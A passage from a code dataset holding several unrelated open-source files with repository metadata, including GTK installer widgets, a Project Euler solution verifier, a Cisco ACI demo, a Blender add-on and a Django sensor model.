c.move_to(x+r,y)\n c.line_to(x+w-r,y); c.curve_to(x+w,y,x+w,y,x+w,y+r)\n c.line_to(x+w,y+h-r); c.curve_to(x+w,y+h,x+w,y+h,x+w-r,y+h)\n c.line_to(x+r,y+h); c.curve_to(x,y+h,x,y+h,x,y+h-r)\n c.line_to(x,y+r); c.curve_to(x,y,x,y,x+r,y)\n c.close_path()\n\ndef gtk_to_cairo_color(c):\n color = Gdk.color_parse(c)\n s = 1.0/65535.0\n r = color.red * s\n g = color.green * s\n b = color.blue * s\n return r, g, b\n\nclass StylizedFrame(Gtk.Alignment):\n __gtype_name__ = 'StylizedFrame'\n __gproperties__ = {\n 'radius': (GObject.TYPE_INT, 'Radius',\n 'The radius of the rounded corners.', 0,\n GObject.constants.G_MAXINT, 10, GObject.PARAM_READWRITE),\n 'width' : (GObject.TYPE_INT, 'Width', 'The width of the outline.',\n 0, GObject.constants.G_MAXINT, 1,\n GObject.PARAM_READWRITE),\n }\n \n def __init__(self):\n Gtk.Alignment.__init__(self)\n self.radius = 10\n self.width = 1\n\n def do_get_property(self, prop):\n if prop.name in ('radius', 'width'):\n return getattr(self, prop.name)\n else:\n return Gtk.Alignment.do_get_property(self, prop)\n\n def do_set_property(self, prop, value):\n if prop.name in ('radius', 'width'):\n setattr(self, prop.name, value)\n self.queue_draw()\n else:\n Gtk.Alignment.do_set_property(self, prop, value)\n\n def paint_background(self, c):\n c.set_source_rgb(*gtk_to_cairo_color('#fbfbfb'))\n alloc = self.get_allocation()\n draw_round_rect(c, self.radius,\n self.width / 2, self.width / 2,\n alloc.width - self.width,\n alloc.height - self.width)\n c.fill_preserve()\n\n def do_draw(self, c):\n # Background\n self.paint_background(c)\n # Edge\n c.set_source_rgb(*gtk_to_cairo_color('#c7c7c6'))\n c.set_line_width(self.width)\n c.stroke()\n if self.get_child():\n top, bottom, left, right = self.get_padding()\n c.translate(left, top)\n self.get_child().draw(c)\n\nGObject.type_register(StylizedFrame)\n\nclass ResizeWidget(Gtk.HPaned):\n __gtype_name__ = 'ResizeWidget'\n __gproperties__ = {\n 'part_size' : (GObject.TYPE_UINT64, 'Partition size',\n 'The size of the partition being resized', 1,\n GObject.constants.G_MAXUINT64, 100,\n GObject.PARAM_READWRITE),\n 'min_size' : (GObject.TYPE_UINT64, 'Minimum size',\n 'The minimum size that the existing partition can ' \\\n 'be resized to', 0, GObject.constants.G_MAXUINT64, 0,\n GObject.PARAM_READWRITE),\n 'max_size' : (GObject.TYPE_UINT64, 'Maximum size',\n 'The maximum size that the existing partition can ' \\\n 'be resized to', 1, GObject.constants.G_MAXUINT64,\n 100, GObject.PARAM_READWRITE)\n }\n \n def do_get_property(self, prop):\n return getattr(self, prop.name.replace('-', '_'))\n\n def do_set_property(self, prop, value):\n setattr(self, prop.name.replace('-', '_'), value)\n\n def __init__(self, part_size=100, min_size=0, max_size=100,\n existing_part=None, new_part=None):\n Gtk.HPaned.__init__(self)\n assert min_size <= max_size <= part_size\n assert part_size > 0\n # The size (b) of the existing partition.\n self.part_size = part_size\n # The min size (b) that the existing partition can be resized to.\n self.min_size = min_size\n # The max size (b) that the existing partition can be resized to.\n self.max_size = max_size\n\n # FIXME: Why do we still need these event boxes to get proper bounds\n # for the linear gradient?\n self.existing_part = existing_part or PartitionBox()\n eb = Gtk.EventBox()\n eb.add(self.existing_part)\n self.pack1(eb, resize=False, shrink=False)\n self.new_part = new_part or PartitionBox()\n eb = Gtk.EventBox()\n eb.add(self.new_part)\n self.pack2(eb, resize=False, shrink=False)\n self.show_all()\n # FIXME hideous, but do_realize fails inexplicably.\n self.connect('realize', self.realize)\n\n def realize(self, w):\n # TEST: Make sure the value of the minimum size and maximum size\n # equal the value of the widget when pushed to the min/max.\n total = (self.new_part.get_allocation().width +\n self.existing_part.get_allocation().width)\n tmp = float(self.min_size) / self.part_size\n pixels = int(tmp * total)\n self.existing_part.set_size_request(pixels, -1)\n\n tmp = ((float(self.part_size) - self.max_size) / self.part_size)\n pixels = int(tmp * total)\n self.new_part.set_size_request(pixels, -1)\n\n def do_draw(self, cr):\n s1 = self.existing_part.get_allocation().width\n s2 = self.new_part.get_allocation().width\n total = s1 + s2\n\n percent = (float(s1) / float(total))\n self.existing_part.set_size(percent * self.part_size)\n percent = (float(s2) / float(total))\n self.new_part.set_size(percent * self.part_size)\n\n def set_pref_size(self, size):\n s1 = self.existing_part.get_allocation().width\n s2 = self.new_part.get_allocation().width\n total = s1 + s2\n\n percent = (float(size) / float(self.part_size))\n val = percent * total\n self.set_position(int(val))\n\n def get_size(self):\n '''Returns the size of the old partition,\n clipped to the minimum and maximum sizes.\n '''\n s1 = self.existing_part.get_allocation().width\n s2 = self.new_part.get_allocation().width\n totalwidth = s1 + s2\n size = int(float(s1) * self.part_size / float(totalwidth))\n if size < self.min_size:\n return self.min_size\n elif size > self.max_size:\n return self.max_size\n else:\n return size\n\n\nGObject.type_register(ResizeWidget)\n\nclass DiskBox(Gtk.HBox):\n __gtype_name__ = 'DiskBox'\n\n def add(self, partition, size):\n Gtk.HBox.add(self, partition, expand=False)\n partition.set_size_request(size, -1)\n\n def clear(self):\n self.forall(lambda x: self.remove(x))\n\nGObject.type_register(DiskBox)\n\nclass PartitionBox(StylizedFrame):\n __gtype_name__ = 'PartitionBox'\n __gproperties__ = {\n 'title' : (GObject.TYPE_STRING, 'Title', None, 'Title',\n GObject.PARAM_READWRITE),\n 'icon-name' : (GObject.TYPE_STRING, 'Icon Name', None,\n 'distributor-logo', GObject.PARAM_READWRITE),\n 'extra' : (GObject.TYPE_STRING, 'Extra Text', None, '',\n GObject.PARAM_READWRITE),\n }\n \n def do_get_property(self, prop):\n if prop.name == 'title':\n return self.ostitle.get_text()\n elif prop.name == 'icon-name':\n return self.logo.get_icon_name()\n elif prop.name == 'extra':\n return self.extra.get_text()\n return getattr(self, prop.name)\n\n def do_set_property(self, prop, value):\n if prop.name == 'title':\n self.ostitle.set_markup('<b>%s</b>' % value)\n return\n elif prop.name == 'icon-name':\n self.logo.set_from_icon_name(value, Gtk.IconSize.DIALOG)\n return\n elif prop.name == 'extra':\n self.extra.set_markup('<small>%s</small>' %\n (value and value or ' '))\n return\n setattr(self, prop.name, value)\n\n def __init__(self, title='', extra='', icon_name='distributor-logo'):\n # 10 px above the topmost element\n # 6 px between the icon and the title\n # 4 px between the title and the extra heading\n # 5 px between the extra heading and the size\n # 12 px below the bottom-most element\n StylizedFrame.__init__(self)\n vbox = Gtk.VBox()\n self.logo = Gtk.Image.new_from_icon_name(icon_name,\n Gtk.IconSize.DIALOG)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(10, 0, 0, 0)\n align.add(self.logo)\n vbox.pack_start(align, False, True, 0)\n\n self.ostitle = Gtk.Label()\n self.ostitle.set_ellipsize(Pango.EllipsizeMode.END)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(6, 0, 0, 0)\n align.add(self.ostitle)\n vbox.pack_start(align, False, True, 0)\n\n self.extra = Gtk.Label()\n self.extra.set_ellipsize(Pango.EllipsizeMode.END)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(4, 0, 0, 0)\n align.add(self.extra)\n vbox.pack_start(align, False, True, 0)\n\n self.size = Gtk.Label()\n self.size.set_ellipsize(Pango.EllipsizeMode.END)\n align = Gtk.Alignment.new(0.5, 0.5, 0.5, 0.5)\n align.set_padding(5, 12, 0, 0)\n align.add(self.size)\n vbox.pack_start(align, False, True, 0)\n self.add(vbox)\n\n self.ostitle.set_markup('<b>%s</b>' % title)\n # Take up the space that would otherwise be used to create symmetry.\n self.extra.set_markup('<small>%s</small>' % extra and extra or ' ')\n self.show_all()\n\n def set_size(self, size):\n size = misc.format_size(size)\n self.size.set_markup('<span size=\"x-large\">%s</span>' % size)\n\n def render_dots(self):\n # FIXME: Dots are rendered over the frame.\n s = cairo.ImageSurface(cairo.FORMAT_ARGB32, 2, 2)\n cr = cairo.Context(s)\n cr.set_source_rgb(*gtk_to_cairo_color('#b6b0a9'))\n cr.rectangle(1, 1, 1, 1)\n cr.fill()\n pattern = cairo.SurfacePattern(s)\n return pattern\n\n def paint_background(self, c):\n StylizedFrame.paint_background(self, c)\n a = self.get_allocation()\n pattern = self.render_dots()\n pattern.set_extend(cairo.EXTEND_REPEAT)\n c.set_source(pattern)\n c.fill_preserve()\n\n g = cairo.RadialGradient(a.width / 2, a.height / 2, 0, a.width / 2,\n a.height / 2,\n a.width > a.height and a.width or a.height)\n g.add_color_stop_rgba(0.00, 1, 1, 1, 1.00)\n g.add_color_stop_rgba(0.25, 1, 1, 1, 0.75)\n g.add_color_stop_rgba(0.40, 1, 1, 1, 0.00)\n c.set_source(g)\n c.fill_preserve()\n\nGObject.type_register(PartitionBox)\n\nclass StateBox(StylizedFrame):\n __gtype_name__ = 'StateBox'\n __gproperties__ = {\n 'label' : (GObject.TYPE_STRING, 'Label', None, 'label',\n GObject.PARAM_READWRITE),\n }\n \n def do_get_property(self, prop):\n if prop.name == 'label':\n return self.label.get_text()\n return getattr(self, prop.name)\n\n def do_set_property(self, prop, value):\n if prop.name == 'label':\n self.label.set_text(value)\n return\n setattr(self, prop.name, value)\n \n def __init__(self, text=''):\n StylizedFrame.__init__(self)\n alignment = Gtk.Alignment()\n alignment.set_padding(7, 7, 15, 15)\n hbox = Gtk.HBox()\n hbox.set_spacing(10)\n self.image = Gtk.Image()\n self.image.set_from_stock(Gtk.STOCK_YES, Gtk.IconSize.LARGE_TOOLBAR)\n self.label = Gtk.Label(label=text)\n \n self.label.set_alignment(0, 0.5)\n hbox.pack_start(self.image, False, True, 0)\n hbox.pack_start(self.label, True, True, 0)\n alignment.add(hbox)\n self.add(alignment)\n self.show_all()\n\n self.status = True\n\n def set_state(self, state):\n self.status = state\n if state:\n self.image.set_from_stock(Gtk.STOCK_YES,\n Gtk.IconSize.LARGE_TOOLBAR)\n else:\n self.image.set_from_stock(Gtk.STOCK_NO,\n Gtk.IconSize.LARGE_TOOLBAR)\n\n def get_state(self):\n return self.status\n\nGObject.type_register(StateBox)\n\nFACES_PATH = '/usr/share/pixmaps/faces'\n\nclass FaceSelector(Gtk.VBox):\n __gtype_name__ = 'FaceSelector'\n def __init__(self):\n Gtk.VBox.__init__(self)\n self.set_spacing(12)\n\n vb_left = Gtk.VBox.new(False, 3)\n # TODO i18n\n l = Gtk.Label('Take a photo:')\n vb_left.pack_start(l, False, False, 0)\n f = Gtk.Frame()\n self.webcam = UbiquityWebcam.Webcam()\n self.webcam.connect('image-captured', self.image_captured)\n f.add(self.webcam)\n vb_left.add(f)\n\n vb_right = Gtk.VBox.new(False, 3)\n # TODO i18n\n l = Gtk.Label('Or choose an existing picture:')\n vb_right.pack_start(l, False, False, 0)\n iv = Gtk.IconView()\n iv.connect('selection-changed', self.selection_changed)\n sw = Gtk.ScrolledWindow()\n sw.set_shadow_type(Gtk.ShadowType.IN)\n sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)\n sw.add(iv)\n vb_right.add(sw)\n\n hb = Gtk.HBox.new(True, 30)\n hb.add(vb_left)\n hb.add(vb_right)\n self.add(hb)\n\n self.selected_image = Gtk.Image()\n self.selected_image.set_size_request(96, 96)\n self.add(self.selected_image)\n\n m = Gtk.ListStore(GObject.type_from_name('GdkPixbuf'))\n iv.set_model(m)\n iv.set_pixbuf_column(0)\n if os.path.exists(FACES_PATH):\n for path in os.listdir(FACES_PATH):\n pb = GdkPixbuf.Pixbuf.new_from_file(\n os.path.join(FACES_PATH, path))\n m.append([pb])\n\n def webcam_play(self):\n self.webcam.play()\n\n def webcam_stop(self):\n self.webcam.stop()\n\n def save_to(self, path):\n pb = self.selected_image.get_pixbuf()\n if not pb:\n return False\n\n d = os.path.dirname(path)\n with misc.raised_privileges():\n if not os.path.exists(d):\n os.makedirs(d)\n pb.savev(path, 'png', [], [])\n\n def image_captured(self, unused, path):\n pb = GdkPixbuf.Pixbuf.new_from_file_at_size(path, 96, 96);\n self.selected_image.set_from_pixbuf(pb)\n\n def selection_changed(self, iv):\n selection = iv.get_selected_items()\n if not selection:\n return\n selection = selection[0]\n m = iv.get_model()\n self.selected_image.set_from_pixbuf(m[selection][0])\n\nGObject.type_register(FaceSelector)\n\n","repo_name":"Alberto-Beralix/Beralix","sub_path":"i386-squashfs-root/usr/lib/ubiquity/ubiquity/gtkwidgets.py","file_name":"gtkwidgets.py","file_ext":"py","file_size_in_byte":14874,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"33743582759","text":"import math\nimport os\nimport re\nimport subprocess\nimport sys\nimport time\n\nimport click\n\nfrom EasyEuler import data\nfrom EasyEuler.types import LanguageType\n\n\nPROBLEM_ID_REGEX = re.compile(r'\\D*([1-9]\\d{0,2}).*')\nSTAGES = ('build', 'execute', 'cleanup')\n\n\n@click.command()\n@click.option('--time', '-t', is_flag=True,\n help='Time the execution of files.')\n@click.option('--errors', '-e', is_flag=True,\n help='Show errors.')\n@click.option('--recursive', '-r', is_flag=True,\n help='Verify files in specified directory paths.')\n@click.option('--language', '-l', type=LanguageType(),\n help='The language of the file(s).')\n@click.argument('paths', type=click.Path(exists=True, readable=True), nargs=-1,\n metavar='[PATH]...')\ndef cli(paths, language, time, errors, recursive):\n \"\"\"\n Verify the solution to a problem.\n\n Runs the appropriate command for a language (specified in the\n configuration file) with the file path(s) as arguments.\n\n If the LANGUAGE option isn't specified, it will be identified based\n on the file extension. Similarly, the problem ID will be identified\n based on the file name.\n\n \"\"\"\n\n for path in paths:\n if os.path.isdir(path):\n if recursive:\n validate_directory(path, language, time, errors)\n else:\n click.echo('Skipping %s because it is a directory '\n 'and --recursive was not specified' %\n click.format_filename(path))\n else:\n validate_file(path, language, time, errors)\n\n\ndef validate_directory(path, language, time_execution, show_errors):\n for root, _, filenames in os.walk(path):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n validate_file(file_path, language, time_execution, show_errors)\n\n\ndef validate_file(path, language, time_execution, show_errors):\n problem = get_problem_from_path(path)\n if problem is None:\n click.echo('Skipping %s because it does not contain '\n 'a valid problem ID' % click.format_filename(path))\n return\n\n if language is None:\n language = get_language_from_path(path) or {}\n\n click.echo('Checking output of %s: ' % click.format_filename(path),\n nl=False)\n result = verify_solution(path, language, time_execution, problem)\n print_result(result, show_errors, time_execution)\n\n\ndef print_result(result, show_errors, show_time):\n if result['error'] != 'none':\n if show_errors:\n error_message = result[result['error']]['output']\n else:\n error_message = '[error during %s]' % result['error']\n click.secho('\\n%s' % error_message, fg='red')\n return\n\n click.secho(result['execute']['output'] or '[no output]',\n fg='green' if result['correct'] else 'red')\n\n if show_time:\n print_execution_time(result['execute']['execution_time'])\n\n\ndef print_execution_time(execution_time):\n if 'user' in execution_time:\n execution_time_msg = 'CPU times - user: {user}, ' \\\n 'system: {system}, total: {total}\\n' \\\n 'Wall time: {wall}\\n'\n else:\n execution_time_msg = 'Time: {wall}\\n'\n click.secho(execution_time_msg.format(**execution_time), fg='cyan')\n\n\ndef get_problem_from_path(path):\n problem_id = get_problem_id_from_path(path)\n if problem_id is None:\n return None\n return data.problems.get(problem_id)\n\n\ndef get_language_from_path(path):\n file_extension = os.path.splitext(path)[1].replace('.', '')\n return data.config.get_language('extension', file_extension)\n\n\ndef get_problem_id_from_path(path):\n problem_id = PROBLEM_ID_REGEX.findall(path)\n return int(problem_id[0]) if len(problem_id) > 0 else None\n\n\ndef verify_solution(path, language, time_execution, problem):\n commands = get_commands(path, language)\n result = {'error': 'none'}\n\n for stage in STAGES:\n if commands[stage] is None:\n continue\n\n if stage == 'execute':\n result[stage] = execute_process(commands[stage], time_execution)\n result['correct'] = result[stage]['output'] == problem['answer']\n else:\n result[stage] = execute_process(commands[stage], False)\n\n if result[stage]['error']:\n result['error'] = stage\n break\n\n return result\n\n\ndef get_process_output(process):\n if process.returncode != 0:\n return str(process.stderr, encoding='UTF-8'), True\n return str(process.stdout, encoding='UTF-8').rstrip(), False\n\n\ndef get_commands(path, language):\n commands = {'build': None, 'cleanup': None}\n commands['execute'] = language.get('execute', './{path}').format(path=path)\n\n if 'build' in language:\n commands['build'] = language['build'].format(path=path)\n if 'cleanup' in language:\n commands['cleanup'] = language['cleanup'].format(path=path)\n\n return commands\n\n\ndef execute_process(command, time_execution):\n if time_execution:\n start_time = get_time()\n process = subprocess.run(command, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n end_time = get_time()\n\n execution_time = {key: format_time(end_time[key] - start_time[key])\n for key in end_time}\n else:\n process = subprocess.run(command, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n execution_time = None\n\n output, error = get_process_output(process)\n return {'output': output, 'error': error, 'execution_time': execution_time}\n\n\ntry:\n import resource\n\n def get_time():\n rs = resource.getrusage(resource.RUSAGE_CHILDREN)\n return {'user': rs.ru_utime, 'system': rs.ru_stime,\n 'total': rs.ru_stime + rs.ru_utime, 'wall': time.time()}\nexcept ImportError:\n # The resource module only exists on Unix-based platforms.\n # This is a different platform, so we can't provide user\n # and system times.\n def get_time():\n return {'wall': time.time()}\n\n\ndef format_long_time(timespan):\n \"\"\"\n Formats a long timespan in a human-readable form with a\n precision of a 100th of a second.\n\n \"\"\"\n\n formatted_time = []\n units = (('d', 24 * 60 * 60), ('h', 60 * 60), ('m', 60), ('s', 1))\n\n for unit, length in units:\n value = int(timespan / length)\n\n if value > 0:\n timespan %= length\n formatted_time.append('%i%s' % (value, unit))\n\n if timespan < 1:\n break\n\n return ' '.join(formatted_time)\n\n\ndef format_short_time(timespan):\n \"\"\"\n Formats a short timespan in a human-readable form with a\n precision of a billionth of a second.\n\n \"\"\"\n\n scaling = (1, 1e3, 1e6, 1e9)\n units = ['s', 'ms', 'us', 'ns']\n\n # Attempt to change 'u' to the micro symbol if it's supported.\n if hasattr(sys.stdout, 'encoding') and sys.stdout.encoding:\n try:\n '\\xb5'.encode(sys.stdout.encoding)\n units[2] = '\\xb5s'\n except UnicodeEncodeError:\n pass\n\n if timespan > 0:\n order = min(-int(math.floor(math.log10(timespan)) // 3), 3)\n else:\n order = 3\n\n return '%.*g%s' % (3, timespan * scaling[order], units[order])\n\n\ndef format_time(timespan):\n \"\"\"\n Formats a timespan in a human-readable form.\n Courtesy of IPython.\n\n \"\"\"\n\n if timespan >= 60:\n # If the time is greater than one minute,\n # precision is reduced to a 100th of a second.\n return format_long_time(timespan)\n return format_short_time(timespan)\n","repo_name":"jfblomgren/EasyEuler","sub_path":"EasyEuler/commands/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":7734,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"81"} +{"seq_id":"25036553102","text":"# cs435 2018 spring section 002\n# created by Jae Young Choi\n# homework 1 part b\n# january 30th 2018\n\nimport product\n\nitem1 = product.Product('001', '1 head of lettuce')\nitem2 = product.Product('002', '1 lb of tomatoes')\nitem3 = product.Product('003', '16 oz loaf of bread')\n\nsupermarket = [item1, item2, item3]\n\nitem1.setPrice(1.49)\nitem2.setPrice(1.99)\nitem3.setPrice(0.00)\n\nbasket = ['001', '002', '003', '999']\n\nfor i in supermarket:\n i.printInformation()\n print()\n\nprice = 0\ndef checkout(supermarket, basket):\n for x in supermarket:\n if x.outOfStock() == True:\n print(x.code, 'is out of stock.')\n \n for x in basket:\n if x != item1.code and x != item2.code and x != item3.code:\n print(x, 'is an unidentifiable product.')\n \n for x in supermarket:\n global price\n price += x.dollarAmount\n \ncheckout(supermarket, basket)\nprint(price)\n \n","repo_name":"jaebeezy/hw","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11111937483","text":"from acitoolkit.acitoolkit import Tenant, Context, BridgeDomain, AppProfile\nfrom acitoolkit.acitoolkit import EPG, Interface, L2Interface, Session\nfrom acitoolkit.acitoolkit import Credentials\n\n\ndef send_to_apic(tenant):\n \"\"\"\n Login to APIC and push the config\n\n :param tenant: Tenant class instance\n :return: request response object\n \"\"\"\n description = 'Basic Connectivity Example'\n creds = Credentials('apic', description)\n args = creds.get()\n\n # Login to APIC\n session = Session(args.url, args.login, args.password, False)\n session.login()\n resp = tenant.push_to_apic(session)\n if resp.ok:\n print('Success')\n return resp\n\n\ndef main():\n \"\"\"\n Main execution routine\n\n :return: None\n \"\"\"\n # Create a tenant\n tenant = Tenant('Coke')\n\n # Create a Context and a BridgeDomain\n context = Context('VRF-1', tenant)\n context.set_allow_all()\n bd = BridgeDomain('BD-1', tenant)\n bd.add_context(context)\n\n # Create an App Profile and an EPG\n app = AppProfile('sap', tenant)\n epg = EPG('sapepg', app)\n\n # Attach the EPG to 2 interfaces using VLAN 5 as the encap\n if1 = Interface('eth', '1', '101', '1', '62')\n if2 = Interface('eth', '1', '101', '1', '63')\n vlan5_on_if1 = L2Interface('vlan5_on_if1', 'vlan', '5')\n vlan5_on_if2 = L2Interface('vlan5_on_if2', 'vlan', '5')\n vlan5_on_if1.attach(if1)\n vlan5_on_if2.attach(if2)\n epg.attach(vlan5_on_if1)\n epg.attach(vlan5_on_if2)\n\n # Dump the necessary configuration\n print('URL: ' + str(tenant.get_url()))\n print('JSON: ' + str(tenant.get_json()))\n\n send_to_apic(tenant)\n\n # Clean up\n # tenant.mark_as_deleted()\n # send_to_apic(tenant)\n\nif __name__ == '__main__':\n main()\n","repo_name":"datacenter/acitoolkit","sub_path":"samples/aci-demo-script.py","file_name":"aci-demo-script.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":341,"dataset":"github-code","pt":"81"} +{"seq_id":"74666547463","text":"T = int(input())\nnum_lst = ['3', '6', '9']\nrst = []\nfor i in range(1, T+1):\n k = str(i)\n if '3' in k or '6' in k or '9' in k:\n sub = ''\n for j in k:\n if j not in num_lst:\n continue\n else:\n sub += '-'\n rst.append(sub)\n else:\n rst.append(k)\n\nprint(*rst)","repo_name":"Jeongseulho/CSstudy","sub_path":"Jaehyung/230305/[swea]간단한369게임.py","file_name":"[swea]간단한369게임.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"5058170491","text":"from datetime import date, timedelta\nimport pandas as pd\n\n\ndef program_referrals():\n filename = \"C:/Users/mingus/Documents/\" + str((date.today().replace(day=1) - timedelta(days=1)).month) + \"-\" + \\\n str((date.today().replace(day=1) - timedelta(days=1)).year) + \"_program_referrals.xlsx\"\n\n xl_writer = pd.ExcelWriter(filename, engine='xlsxwriter')\n df = pd.read_csv('C:/Users/mingus/Documents/program_referrals.csv')\n\n df.to_excel(xl_writer, sheet_name='Program Referrals', index=False)\n worksheet = xl_writer.sheets['Program Referrals']\n\n # df.referral_from.value_counts().plot(kind='pie', label='', ax=ax1)\n # df.referral_reason.value_counts().plot(kind='pie', label='', ax=ax2)\n # ax1.set_title('Referral From')\n # ax2.set_title('Referral Reason')\n # fig.tight_layout()\n # fig.savefig('program_referrals.png')\n # worksheet.insert_image('A20', 'program_referrals.png')\n\n xl_writer.save()\n\n\nprogram_referrals()\n","repo_name":"elijahanderson/KHIT-scripts","sub_path":"program_referrals.py","file_name":"program_referrals.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20214365036","text":"import sys\n\nfile = sys.argv[1]\nwith open(file, \"r\") as ifstream, open(file + \".analyze\", \"w\") as ofstream:\n lines = []\n numCommented = 0\n numLabels = 0\n for lineNum, line in enumerate(ifstream.readlines()):\n if line.startswith(\"(\"):\n numLabels += 1\n elif line.startswith(\"//\"):\n lines.append(str(lineNum - numCommented - numLabels) + \" \" + line)\n numCommented += 1\n ofstream.writelines(lines)\n\n","repo_name":"rguan72/nand2tetris","sub_path":"08/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33240585125","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n\nbl_info = {\n \"name\": \"Safe Localview\",\n \"author\": \"todashuta\",\n \"version\": (0, 0, 4),\n \"blender\": (3, 3, 0),\n \"location\": \"-\",\n \"description\": \"-\",\n \"warning\": \"\",\n \"wiki_url\": \"\",\n \"tracker_url\": \"\",\n \"category\": \"3D View\"\n}\n\n\nimport bpy\n\n\ndef get_addon_prefs():\n addon_prefs = bpy.context.preferences.addons[__name__].preferences\n return addon_prefs\n\n\nshading_types = {\n \"WIREFRAME\": \"Wireframe\",\n \"SOLID\": \"Solid\",\n}\n\n\nclass SafeLocalviewOperator(bpy.types.Operator):\n bl_idname = \"view3d.safe_localview\"\n bl_label = \"Safe Localview\"\n\n @classmethod\n def poll(cls, context):\n return bpy.ops.view3d.localview.poll()\n\n def execute(self, context):\n prefs = get_addon_prefs()\n in_localview = context.space_data.local_view is not None\n shading_type = context.space_data.shading.type\n if (in_localview and\n shading_type in {'MATERIAL', 'RENDERED'}):\n t = prefs.preferred_shading_type\n context.space_data.shading.type = t\n msg = f\"Viewport Shading changed to {shading_types[t]}\"\n self.report({\"INFO\"}, msg)\n\n return bpy.ops.view3d.localview(frame_selected=prefs.frame_selected)\n\n\ndef auto_rebind(self, context):\n unregister_keymaps()\n register_keymaps()\n\n\nclass SafeLocalviewPreferences(bpy.types.AddonPreferences):\n bl_idname = __name__\n\n items = (\n (\"WIREFRAME\", \"Wireframe\", \"\"),\n (\"SOLID\", \"Solid\", \"\"))\n preferred_shading_type: bpy.props.EnumProperty(\n name=\"Preferred Shading Type\",\n items=items)\n\n frame_selected: bpy.props.BoolProperty(\n name=\"Frame Selected\",\n description=\"Move the view to frame the selected objects\",\n default=True)\n\n use_shortcut: bpy.props.BoolProperty(\n name=\"Use Default Shortcut\",\n default=True,\n update=auto_rebind)\n\n def draw(self, context):\n layout = self.layout\n row = layout.row()\n row.prop(self, \"preferred_shading_type\")\n row.prop(self, \"frame_selected\")\n row.prop(self, \"use_shortcut\")\n\n\naddon_keymaps = []\ndef register_keymaps():\n prefs = get_addon_prefs()\n if not prefs.use_shortcut:\n return\n\n kc = bpy.context.window_manager.keyconfigs.addon\n if not kc:\n return\n\n km = kc.keymaps.new(name=\"3D View\", space_type=\"VIEW_3D\")\n kmi = km.keymap_items.new(SafeLocalviewOperator.bl_idname, \"SLASH\", \"PRESS\")\n addon_keymaps.append((km, kmi))\n\n km = kc.keymaps.new(name=\"3D View\", space_type=\"VIEW_3D\")\n kmi = km.keymap_items.new(SafeLocalviewOperator.bl_idname, \"NUMPAD_SLASH\", \"PRESS\")\n addon_keymaps.append((km, kmi))\n\ndef unregister_keymaps():\n for km,kmi in addon_keymaps:\n km.keymap_items.remove(kmi)\n addon_keymaps.clear()\n\n\nclasses = (\n SafeLocalviewPreferences,\n SafeLocalviewOperator,\n)\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n register_keymaps()\n\n\ndef unregister():\n unregister_keymaps()\n\n for cls in reversed(classes):\n bpy.utils.unregister_class(cls)\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"todashuta/blender-addon-safe-localview","sub_path":"safe_localview.py","file_name":"safe_localview.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5059808876","text":"from datetime import datetime\nfrom typing import Any, cast\nimport arrow\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import Avg\nfrom influxdb_client import InfluxDBClient\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nfrom .secrets import INFLUXDB_BUCKET, INFLUXDB_ORG, INFLUXDB_TOKEN\nfrom django.utils.text import slugify\n# Create your models here.\nfrom twilio.rest import Client\n\n# Comment this out if you don't want to set up Twilio alerts\ntwilio_client = Client(\"<SECRET>\", \"<SECRET>\")\n\n\nclass Sensor(models.Model):\n name = models.CharField(max_length=60)\n sensor_id = models.CharField(max_length=100, default=\"\")\n high_critical = models.DecimalField(max_digits=30, decimal_places=10, null=True)\n high_warn = models.DecimalField(max_digits=30, decimal_places=10, null=True)\n\n @property\n def average(self):\n avg = self.data.aggregate(Avg(\"numeric_value\"))[\"numeric_value__avg\"]\n if avg:\n return round(avg, 2)\n return 0.00\n\n @property\n def count(self):\n return self.data.all().count()\n\n @property\n def last_data_point(self) -> \"SensorData\":\n return self.data.all().order_by(\"-datetime\").first()\n\n @property\n def last_eastern(self):\n if self.last_data_point:\n dt = self.last_data_point.datetime\n adt = arrow.Arrow.fromdatetime(dt)\n eastern = arrow.now(\"America/New_York\").tzinfo\n dt = adt.astimezone(eastern)\n adt = arrow.Arrow.fromdatetime(dt)\n return adt.format(\"M/D/YYYY h:mm a\")\n return \"\"\n\n @property\n def last_numeric(self):\n val = self.last_data_point.numeric_value\n if val:\n return round(val, 2)\n return 